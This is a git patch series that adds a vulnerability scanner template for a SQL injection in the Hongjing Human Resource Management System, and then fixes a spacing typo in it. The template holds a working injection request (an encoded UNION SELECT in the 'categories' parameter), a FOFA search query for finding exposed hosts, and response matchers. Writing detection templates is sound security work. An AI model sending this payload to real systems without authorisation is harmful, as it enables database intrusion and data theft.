From 5fc698646691a58413d311a43dd60806c48ff7a3 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Mon, 21 Aug 2023 23:56:19 +0530
Subject: [PATCH 1/2] Create CNVD-2023-08743.yaml

---
 http/cnvd/2023/CNVD-2023-08743.yaml | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 http/cnvd/2023/CNVD-2023-08743.yaml

diff --git a/http/cnvd/2023/CNVD-2023-08743.yaml b/http/cnvd/2023/CNVD-2023-08743.yaml
new file mode 100644
index 0000000000..b7b642d9c7
--- /dev/null
+++ b/http/cnvd/2023/CNVD-2023-08743.yaml
@@ -0,0 +1,29 @@
+id: CNVD-2023-08743
+
+info:
+  name:  Hongjing Human Resource Management System - SQL Injection
+  author: SleepingBag945
+  severity: critical
+  description: There is a SQL injection vulnerability in the categories of Hongjing Human Resource Management System, from which attackers can obtain sensitive database information.
+  reference:
+    - https://www.henry4e36.top/index.php/archives/162.html
+    - https://blog.csdn.net/qq_41904294/article/details/130944159
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: title="人力资源信息管理系统"
+  tags: cnvd,cnvd2023,hongjing,hcm
+
+http:
+  - raw:
+      - |
+        GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(header,"text/xml")'
+          - 'contains_all(body,"TreeNode id=\"hongjing","SQL Server")'
+        condition: and

From c9ccec96837c0583751b5b4c6b8ada1730ef39c0 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Mon, 21 Aug 2023 23:59:14 +0530
Subject: [PATCH 2/2] link fix

---
 http/cnvd/2023/CNVD-2023-08743.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/cnvd/2023/CNVD-2023-08743.yaml b/http/cnvd/2023/CNVD-2023-08743.yaml
index b7b642d9c7..85f218ec33 100644
--- a/http/cnvd/2023/CNVD-2023-08743.yaml
+++ b/http/cnvd/2023/CNVD-2023-08743.yaml
@@ -1,7 +1,7 @@
 id: CNVD-2023-08743
 
 info:
-  name:  Hongjing Human Resource Management System - SQL Injection
+  name: Hongjing Human Resource Management System - SQL Injection
   author: SleepingBag945
   severity: critical
   description: There is a SQL injection vulnerability in the categories of Hongjing Human Resource Management System, from which attackers can obtain sensitive database information.